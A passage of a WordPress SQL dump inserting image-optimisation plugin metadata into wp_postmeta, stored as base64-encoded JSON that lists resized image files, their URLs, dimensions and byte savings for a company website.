WN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem8tNTItMS0yLWUxNDczMjYwMDgwNzA2LTI0N3gxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1ODIyLCJpZCI6NTk4fV0='); 
INSERT INTO `wp_postmeta` VALUES (30149, 596, 'wpfc_optimisation_reduction', '1404'); 
INSERT INTO `wp_postmeta` VALUES (30150, 596, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLmpwZyIsIndpZHRoIjoyNzUsImhlaWdodCI6MTE0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLmpwZyIsInJlZHVjdGlvbiI6MTAzNCwidGltZSI6MTQ4MzU4NTgyOCwiaWQiOiI1OTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2hleGlvbi1lMTQ3MTYxOTAwMzY4MS0yNTB4MTE0LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTE0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2hleGlvbi1lMTQ3MTYxOTAwMzY4MS0yNTB4MTE0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2hleGlvbi1lMTQ3MTYxOTAwMzY4MS0yNTB4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTgzMSwiaWQiOjU5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9oZXhpb24tZTE0NzE2MTkwMDM2ODEtMjAweDExNC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9oZXhpb24tZTE0NzE2MTkwMDM2ODEtMjAweDExNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9oZXhpb24tZTE0NzE2MTkwMDM2ODEtMjAweDExNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4MzMsImlkIjo1OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLTIyNXgxMTQuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLTIyNXgxMTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLTIyNXgxMTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1ODM1LCJpZCI6NTk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLTExNHgxMTQuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLTExNHgxMTQuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMTQiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvaGV4aW9uLWUxNDcxNjE5MDAzNjgxLTExNHgxMTQuanBnIiwicmVkdWN0aW9uIjozNjYsInRpbWUiOjE0ODM1ODU4MzcsImlkIjo1OTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9oZXhpb24tZTE0NzE2MTkwMDM2ODEtMjQ3eDExNC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9oZXhpb24tZTE0NzE2MTkwMDM2ODEtMjQ3eDExNC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjExNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9oZXhpb24tZTE0NzE2MTkwMDM2ODEtMjQ3eDExNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4MzksImlkIjo1OTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30151, 595, 'wpfc_optimisation_reduction', '1242'); 
INSERT INTO `wp_postmeta` VALUES (30152, 595, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X2dyZXktZTE0NzE2MTkwMzI3NjkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfZ3JleS1lMTQ3MTYxOTAzMjc2OS5qcGciLCJ3aWR0aCI6Mjc1LCJoZWlnaHQiOjExNCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveF9ncmV5LWUxNDcxNjE5MDMyNzY5LmpwZyIsInJlZHVjdGlvbiI6ODk4LCJ0aW1lIjoxNDgzNTg1ODQ1LCJpZCI6IjU5NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X2dyZXktZTE0NzE2MTkwMzI3NjktMjUweDExNC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfZ3JleS1lMTQ3MTYxOTAzMjc2OS0yNTB4MTE0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveF9ncmV5LWUxNDcxNjE5MDMyNzY5LTI1MHgxMTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1ODQ3LCJpZCI6NTk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveF9ncmV5LWUxNDcxNjE5MDMyNzY5LTIwMHgxMTQuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X2dyZXktZTE0NzE2MTkwMzI3NjktMjAweDExNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3hfZ3JleS1lMTQ3MTYxOTAzMjc2OS0yMDB4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTg0OSwiaWQiOjU5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfZ3JleS1lMTQ3MTYxOTAzMjc2OS0yMjV4MTE0LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTE0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveF9ncmV5LWUxNDcxNjE5MDMyNzY5LTIyNXgxMTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94X2dyZXktZTE0NzE2MTkwMzI3NjktMjI1eDExNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4NTEsImlkIjo1OTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3hfZ3JleS1lMTQ3MTYxOTAzMjc2OS0xMTR4MTE0LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveF9ncmV5LWUxNDcxNjE5MDMyNzY5LTExNHgxMTQuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMTQiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94X2dyZXktZTE0NzE2MTkwMzI3NjktMTE0eDExNC5qcGciLCJyZWR1Y3Rpb24iOjM0MCwidGltZSI6MTQ4MzU4NTg1MywiaWQiOjU5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveF9ncmV5LWUxNDcxNjE5MDMyNzY5LTI0N3gxMTQuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94X2dyZXktZTE0NzE2MTkwMzI3NjktMjQ3eDExNC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjExNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3hfZ3JleS1lMTQ3MTYxOTAzMjc2OS0yNDd4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTg1NSwiaWQiOjU5NX1d'); 
INSERT INTO `wp_postmeta` VALUES (30153, 593, 'wpfc_optimisation_reduction', '1744'); 
INSERT INTO `wp_postmeta` VALUES (30154, 593, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLmpwZyIsIndpZHRoIjo0ODAsImhlaWdodCI6MjEzLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLmpwZyIsInJlZHVjdGlvbiI6MTMzNywidGltZSI6MTQ4MzU4NTg2MiwiaWQiOiI1OTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0zNDB4MjEzLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MjEzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0zNDB4MjEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0zNDB4MjEzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTg2NCwiaWQiOjU5M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMjUweDIxMy5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjIxMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMjUweDIxMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMjUweDIxMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4NjYsImlkIjo1OTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1ODY4LCJpZCI6NTkzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0yMjV4MjEzLmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjEzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0yMjV4MjEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0yMjV4MjEzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTg3MCwiaWQiOjU5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem84OC1lMTQ3MTYxODAyNzEyMy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6Mjg3LCJ0aW1lIjoxNDgzNTg1ODcyLCJpZCI6NTkzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmF6bzg4LWUxNDcxNjE4MDI3MTIzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMTMsInRpbWUiOjE0ODM1ODU4NzQsImlkIjo1OTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMjQ3eDIxMy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMjQ3eDIxMy5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjIxMyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMjQ3eDIxMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4NzYsImlkIjo1OTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMzAweDIxMy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMzAweDIxMy5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjIxMyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtMzAweDIxMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4NzksImlkIjo1OTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtNDAweDIxMy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtNDAweDIxMy5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjIxMyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvODgtZTE0NzE2MTgwMjcxMjMtNDAweDIxMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4ODEsImlkIjo1OTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30155, 584, 'wpfc_optimisation_reduction', '1646'); 
INSERT INTO `wp_postmeta` VALUES (30156, 584, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYuanBnIiwid2lkdGgiOjQ5NiwiaGVpZ2h0IjoyNDUsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LmpwZyIsInJlZHVjdGlvbiI6MTM0NiwidGltZSI6MTQ4MzU4NTg4NywiaWQiOiI1ODQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtMzQweDI0NS5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjI0NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTM0MHgyNDUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni0zNDB4MjQ1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTg4OSwiaWQiOjU4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTI1MHgyNDUuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNDUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni0yNTB4MjQ1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtMjUweDI0NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU4OTEsImlkIjo1ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8